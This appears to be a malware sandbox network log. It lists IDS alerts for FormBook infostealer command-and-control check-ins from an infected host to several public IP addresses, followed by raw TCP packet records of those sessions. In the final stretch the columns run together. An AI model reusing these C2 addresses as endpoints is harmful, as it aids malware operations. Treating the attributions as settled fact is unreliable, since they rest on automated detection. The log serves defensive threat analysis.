2024-09-26T15:23:08.176919+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49719 | 3.33.130.190 | 80 | TCP
2024-09-26T15:23:11.813069+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49720 | 3.33.130.190 | 80 | TCP
2024-09-26T15:23:13.466122+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49721 | 3.33.130.190 | 80 | TCP
2024-09-26T15:23:16.977869+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49722 | 3.33.130.190 | 80 | TCP
2024-09-26T15:23:16.977869+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49722 | 3.33.130.190 | 80 | TCP
2024-09-26T15:23:22.709740+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49724 | 67.223.117.189 | 80 | TCP
2024-09-26T15:23:25.262284+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49725 | 67.223.117.189 | 80 | TCP
2024-09-26T15:23:27.824971+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49726 | 67.223.117.189 | 80 | TCP
2024-09-26T15:23:31.454204+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49727 | 67.223.117.189 | 80 | TCP
2024-09-26T15:23:31.454204+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49727 | 67.223.117.189 | 80 | TCP
2024-09-26T15:23:38.628177+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49728 | 103.248.137.209 | 80 | TCP
2024-09-26T15:23:41.173987+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49729 | 103.248.137.209 | 80 | TCP
2024-09-26T15:23:43.720757+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49730 | 103.248.137.209 | 80 | TCP
2024-09-26T15:24:06.264764+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49731 | 103.248.137.209 | 80 | TCP
2024-09-26T15:24:06.264764+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49731 | 103.248.137.209 | 80 | TCP
2024-09-26T15:24:19.848287+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49732 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:22.382753+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49733 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:24.949810+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49734 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:27.494268+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49735 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:27.494268+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49735 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:32.994875+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49736 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:35.552839+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49737 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:38.092661+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49738 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:40.651608+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49739 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:40.651608+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49739 | 3.33.130.190 | 80 | TCP
2024-09-26T15:24:46.627043+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49740 | 85.153.138.113 | 80 | TCP
2024-09-26T15:24:49.258935+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49741 | 85.153.138.113 | 80 | TCP
2024-09-26T15:24:51.979677+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49742 | 85.153.138.113 | 80 | TCP
2024-09-26T15:24:54.672159+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49743 | 85.153.138.113 | 80 | TCP
2024-09-26T15:24:54.672159+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49743 | 85.153.138.113 | 80 | TCP
2024-09-26T15:25:00.942005+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49744 | 172.67.165.25 | 80 | TCP
2024-09-26T15:25:03.909947+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49745 | 172.67.165.25 | 80 | TCP
2024-09-26T15:25:07.014255+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49746 | 172.67.165.25 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 15:22:25.025877953 CEST | 49709 | 80 | 192.168.2.5 | 81.88.63.46
Sep 26, 2024 15:22:25.030900002 CEST | 80 | 49709 | 81.88.63.46 | 192.168.2.5
Sep 26, 2024 15:22:25.031044006 CEST | 49709 | 80 | 192.168.2.5 | 81.88.63.46
Sep 26, 2024 15:22:25.040668964 CEST | 49709 | 80 | 192.168.2.5 | 81.88.63.46
Sep 26, 2024 15:22:25.045550108 CEST | 80 | 49709 | 81.88.63.46 | 192.168.2.5
Sep 26, 2024 15:22:25.683492899 CEST | 80 | 49709 | 81.88.63.46 | 192.168.2.5
Sep 26, 2024 15:22:25.683912039 CEST | 80 | 49709 | 81.88.63.46 | 192.168.2.5
Sep 26, 2024 15:22:25.684015989 CEST | 49709 | 80 | 192.168.2.5 | 81.88.63.46
Sep 26, 2024 15:22:25.687313080 CEST | 49709 | 80 | 192.168.2.5 | 81.88.63.46
Sep 26, 2024 15:22:25.692986012 CEST | 80 | 49709 | 81.88.63.46 | 192.168.2.5
Sep 26, 2024 15:22:40.761929035 CEST | 49710 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:40.766916990 CEST | 80 | 49710 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:40.767004013 CEST | 49710 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:40.778537035 CEST | 49710 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:40.783373117 CEST | 80 | 49710 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:41.397710085 CEST | 80 | 49710 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:41.398663044 CEST | 80 | 49710 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:41.399077892 CEST | 49710 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:42.283520937 CEST | 49710 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:43.304529905 CEST | 49711 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:43.309376955 CEST | 80 | 49711 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:43.309511900 CEST | 49711 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:43.321964979 CEST | 49711 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:43.326798916 CEST | 80 | 49711 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:43.918278933 CEST | 80 | 49711 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:43.918340921 CEST | 80 | 49711 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:43.918437004 CEST | 49711 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:44.830796003 CEST | 49711 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:45.849092960 CEST | 49712 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:45.853943110 CEST | 80 | 49712 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:45.854037046 CEST | 49712 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:45.866069078 CEST | 49712 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:45.870929003 CEST | 80 | 49712 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:45.871089935 CEST | 80 | 49712 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:46.509876013 CEST | 80 | 49712 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:46.509916067 CEST | 80 | 49712 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:46.510004997 CEST | 49712 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:47.377974987 CEST | 49712 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:48.396157980 CEST | 49713 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:48.585870981 CEST | 80 | 49713 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:48.586039066 CEST | 49713 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:48.595016956 CEST | 49713 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:48.599879026 CEST | 80 | 49713 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:49.195121050 CEST | 80 | 49713 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:49.195178032 CEST | 80 | 49713 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:49.195211887 CEST | 80 | 49713 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:49.195322037 CEST | 49713 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:49.195354939 CEST | 49713 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:49.206470966 CEST | 49713 | 80 | 192.168.2.5 | 217.70.184.50
Sep 26, 2024 15:22:49.211596012 CEST | 80 | 49713 | 217.70.184.50 | 192.168.2.5
Sep 26, 2024 15:22:54.494374037 CEST | 49714 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:54.500123024 CEST | 80 | 49714 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:54.500211954 CEST | 49714 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:54.511765003 CEST | 49714 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:54.516706944 CEST | 80 | 49714 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:54.968684912 CEST | 80 | 49714 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:54.968708992 CEST | 80 | 49714 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:54.968756914 CEST | 49714 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:56.017724037 CEST | 49714 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:57.043193102 CEST | 49716 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:57.049767017 CEST | 80 | 49716 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:57.049886942 CEST | 49716 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:57.069202900 CEST | 49716 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:57.074096918 CEST | 80 | 49716 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:57.503612995 CEST | 80 | 49716 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:57.503660917 CEST | 80 | 49716 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:57.503736019 CEST | 49716 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:58.580164909 CEST | 49716 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:59.606446028 CEST | 49717 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:59.611922979 CEST | 80 | 49717 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:59.612037897 CEST | 49717 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:59.623418093 CEST | 49717 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:22:59.628257036 CEST | 80 | 49717 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:22:59.628467083 CEST | 80 | 49717 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:23:00.059273958 CEST | 80 | 49717 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:23:00.059626102 CEST | 80 | 49717 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:23:00.059704065 CEST | 49717 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:23:01.127096891 CEST | 49717 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:23:02.146279097 CEST | 49718 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:23:02.175646067 CEST | 80 | 49718 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:23:02.175872087 CEST | 49718 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:23:02.183551073 CEST | 49718 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:23:02.188457012 CEST | 80 | 49718 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:23:02.624314070 CEST | 80 | 49718 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:23:02.624357939 CEST | 80 | 49718 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:23:02.624619007 CEST | 49718 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:23:02.645157099 CEST | 49718 | 80 | 192.168.2.5 | 172.96.187.60
Sep 26, 2024 15:23:02.650022030 CEST | 80 | 49718 | 172.96.187.60 | 192.168.2.5
Sep 26, 2024 15:23:07.717573881 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:07.722366095 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:07.722467899 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:07.737963915 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:07.742721081 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:08.176808119 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:08.176918983 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:09.252321959 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:09.257275105 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:10.411186934 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:10.416630983 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:10.416726112 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:10.471750975 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:10.476737976 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:11.812869072 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:11.813069105 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:11.986623049 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:11.991638899 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:13.005719900 CEST | 49721 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:13.010617018 CEST | 80 | 49721 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:13.010742903 CEST | 49721 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:13.021862030 CEST | 49721 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:13.026712894 CEST | 80 | 49721 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:13.026758909 CEST | 80 | 49721 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:13.466041088 CEST | 80 | 49721 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:13.466121912 CEST | 49721 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:14.534454107 CEST | 49721 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:14.539376974 CEST | 80 | 49721 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:15.552663088 CEST | 49722 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:15.557748079 CEST | 80 | 49722 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:15.557871103 CEST | 49722 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:15.565221071 CEST | 49722 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:15.570041895 CEST | 80 | 49722 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:16.977345943 CEST | 80 | 49722 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:16.977456093 CEST | 80 | 49722 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:16.977869034 CEST | 49722 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:16.980937004 CEST | 49722 | 80 | 192.168.2.5 | 3.33.130.190
Sep 26, 2024 15:23:16.987016916 CEST | 80 | 49722 | 3.33.130.190 | 192.168.2.5
Sep 26, 2024 15:23:22.112643957 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.117717981 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.117861032 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.129138947 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.134226084 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.709606886 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.709640026 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.709655046 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.709739923 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.709822893 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.709830046 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.710040092 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.710150003 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.710156918 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.710163116 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.710449934 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.710556984 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.710571051 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.710633039 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.714574099 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.714679003 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.714689016 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.714740038 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.796557903 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.796567917 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.796598911 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.796785116 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.796885014 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.796921015 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.797106028 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797111034 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797117949 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797122002 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797239065 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.797420025 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797611952 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797616959 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797914028 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797919989 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.797938108 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.798002958 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:22.798203945 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.798392057 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.798398972 CEST | 80 | 49724 | 67.223.117.189 | 192.168.2.5
Sep 26, 2024 15:23:22.798568964 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:23.642640114 CEST | 49724 | 80 | 192.168.2.5 | 67.223.117.189
Sep 26, 2024 15:23:24.661715031 CEST | 49725 | 80 | 192.168.2.5 | 67.223.117.189
                                              Sep 26, 2024 15:23:24.666676044 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:24.666800022 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:24.677985907 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:24.683047056 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.261872053 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262027979 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262186050 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262192011 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262284040 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.262284040 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.262511969 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262516975 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262528896 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262662888 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262670994 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262681961 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.262692928 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.262747049 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.267330885 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.267509937 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.267520905 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.267652988 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.268162966 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.268331051 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.268455982 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.348690033 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.348777056 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.348783016 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.348970890 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349036932 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.349124908 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349131107 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349334955 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349512100 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349522114 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349536896 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.349805117 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349812031 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.349837065 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.350126028 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350151062 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.350271940 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350279093 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350384951 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.350537062 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350543976 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.350879908 CEST804972567.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:25.353972912 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:25.357109070 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:26.189704895 CEST4972580192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.209052086 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.214026928 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.214262962 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.226273060 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.231288910 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.231297970 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.824871063 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.824929953 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.824939966 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.824970961 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.825109005 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825119972 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825129986 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825146914 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.825175047 CEST4972680192.168.2.567.223.117.189
                                              Sep 26, 2024 15:23:27.825408936 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825419903 CEST804972667.223.117.189192.168.2.5
                                              Sep 26, 2024 15:23:27.825428963 CEST804972667.223.117.189192.168.2.5
